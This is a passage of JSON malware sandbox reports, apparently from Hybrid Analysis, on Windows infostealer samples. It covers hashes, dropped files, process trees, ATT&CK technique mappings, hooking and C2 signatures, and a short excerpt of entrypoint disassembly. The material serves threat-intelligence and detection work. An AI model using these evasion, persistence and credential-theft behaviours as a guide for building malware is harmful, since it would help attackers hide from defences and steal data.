\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has section name CODE with entropy \"6.40280692921\"\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" has section name .reloc with entropy \"6.75219683931\"\n \"upNext.tmp\" has section name CODE with entropy \"6.4027065975\"\n \"upNext.tmp\" has section name .reloc with entropy \"6.75219683931\"\n \"DISMHOST.EXE.67A482A2.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A482A2.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-22", "type": 7, "relevance": 10, "name": "Uses a browser-related user-agent without launching browser", "description": "Found user-agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" opened \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" with delete access\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" opened \"C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileW@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"upNext.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"upNext.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"upNext.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2
https://hybrid-analysis.com/sample/6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2
Hybrid Analysis - Infostealers
{"size": 63049, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2", "sha256": "6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2", "av_detect": 91, "vx_family": "Dacic.1A7FA519.A.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 2, "total_processes": 4, "total_signatures": 159, "extracted_files": [{"name": "ewiuer2.exe", "file_path": "%APPDATA%\\ewiuer2.exe", "file_size": 63049, "sha256": "375d0bc93746256c452bbd49f16bd14324082f07b7ea253c544217ea081a6884", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ewiuer2.exe", "file_path": "%WINDIR%\\System32\\ewiuer2.exe", "file_size": 63049, "sha256": "ec1de36a38c574f3952677c73e6139b161f72e71dffa2f864d9ab481f58cd818", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe (PID: 5716)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "viesazm.mpk", "file_path": "%WINDIR%\\System32\\viesazm.mpk", "file_size": 100, "sha256": "2a41ebc724ea32ba97b250c6ba3e8c33d77dc1e99af2d483c0a8332b341746a2", "type_tags": ["data"], "description": "data", "runtime_process": "ewiuer2.exe (PID: 3644)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "EWIUER2.EXE.67A4889D.bin", "file_size": 63049, "sha256": "ec1de36a38c574f3952677c73e6139b161f72e71dffa2f864d9ab481f58cd818", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 8.00 (Visual Studio 2005) (build: 50727)", "10 .CPP Files (with LTCG) compiled with CL.EXE 14.00 (Visual Studio 2005) (build: 50727)"], "imported_objects": ["19 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 4035)", "4 .C Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 4035)", "13 .C Files compiled with CL.EXE 14.00 (Visual Studio 2005) (build: 50727)", "12 .ASM Files assembled with MASM 8.00 (Visual Studio 2005) (build: 50727)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File was optimized using LTCG and/or POGO", "File is the product of a small codebase (10 files)"], "total_file_compositions_imports": 112}, "processes": [{"uid": "00000000-00005716", "name": "6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe", "normalized_path": "C:\\6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe", "sha256": "6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2"}, {"uid": "00000000-00005912", "parentuid": "00000000-00005716", "name": "ewiuer2.exe", "normalized_path": "%APPDATA%\\ewiuer2.exe", "sha256": "375d0bc93746256c452bbd49f16bd14324082f07b7ea253c544217ea081a6884"}, {"uid": "00000000-00006088", "parentuid": "00000000-00005912", "name": "ewiuer2.exe", "normalized_path": "%WINDIR%\\System32\\ewiuer2.exe", "sha256": "ec1de36a38c574f3952677c73e6139b161f72e71dffa2f864d9ab481f58cd818"}, {"uid": "00000000-00003644", "parentuid": "00000000-00006088", "name": "ewiuer2.exe", "normalized_path": "%WINDIR%\\System32\\ewiuer2.exe", "command_line": "/nomove", "sha256": "ec1de36a38c574f3952677c73e6139b161f72e71dffa2f864d9ab481f58cd818"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "JavaScript", "attck_id": "T1059.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/007", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 2}, {"tactic": "Credential Access", "technique": "Credentials In Files", "attck_id": "T1552.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552/001", "malicious_identifiers_count": 1, "parent": {"technique": "Unsecured Credentials", "attck_id": "T1552", "attck_id_wiki": "https://attack.mitre.org/techniques/T1552"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 4, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 5, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"ewiuer2.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\")\n \"ewiuer2.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\")\n \"ewiuer2.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32\")\n \"ewiuer2.exe\" touched \"NetworkListManager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ewiuer2.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"EWIUER2.EXE.67A4889D.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\teax, 0x1800,call\t0x40d5a0,push\tebx,push\tesi,push\tedi,mov\tedi, dword ptr [0x40e0ac],mov\tesi, 0x400,push\tesi,lea\teax, [ebp - 0x800],push\teax,xor\tebx, ebx,push\tebx,call\tedi,push\t0x40f4fc,lea\teax, [ebp - 0x800],call\t0x405493,test\teax, eax,pop\tecx,je\t0x40b3cf,push\tesi,lea\teax, [ebp - 0x800],push\teax,push\tebx,call\tedi,push\t1,lea\teax, [ebp - 0x800],push\teax,push\t0x40f414,push\t0x40f1f0,push\t0x80000001,\"\n \"ewiuer2.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\teax, 0x1800,call\t0x40d5a0,push\tebx,push\tesi,push\tedi,mov\tedi, dword ptr [0x40e0ac],mov\tesi, 0x400,push\tesi,lea\teax, [ebp - 0x800],push\teax,xor\tebx, ebx,push\tebx,call\tedi,push\t0x40f4fc,lea\teax, [ebp - 0x800],call\t0x405493,test\teax, eax,pop\tecx,je\t0x40b3cf,push\tesi,lea\teax, [ebp - 0x800],push\teax,push\tebx,call\tedi,push\t1,lea\teax, [ebp - 0x800],push\teax,push\t0x40f414,push\t0x40f1f0,push\t0x80000001,\"\n \"EWIUER2.EXE.67A4889D.bin\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\teax, 0x1800,call\t0x40d5a0,push\tebx,push\tesi,push\tedi,mov\tedi, dword ptr [0x40e0ac],mov\tesi, 0x400,push\tesi,lea\teax, [ebp - 0x800],push\teax,xor\tebx, ebx,push\tebx,call\tedi,push\t0x40f4fc,lea\teax, [ebp - 0x800],call\t0x405493,test\teax, eax,pop\tecx,je\t0x40b3cf,push\tesi,lea\teax, [ebp - 0x800],push\teax,push\tebx,call\tedi,push\t1,lea\teax, [ebp - 0x800],push\teax,push\t0x40f414,push\t0x40f1f0,push\t0x80000001,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70a00000\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" loaded module \"KERNEL32\" at base 758a0000\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 68d80000\n \"ewiuer2.exe\" loaded module \"WS2_32.DLL\" at base 75b60000\n \"ewiuer2.exe\" loaded module \"WINHTTP.DLL\" at base 717b0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74c80000\n \"ewiuer2.exe\" loaded module \"IPHLPAPI.DLL\" at base 734c0000\n \"ewiuer2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74c70000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 6d160000\n \"ewiuer2.exe\" loaded module \"DNSAPI.DLL\" at base 74b40000\n \"ewiuer2.exe\" loaded module \"RPCRT4.DLL\" at base 771a0000\n \"ewiuer2.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77500000\n \"ewiuer2.exe\" 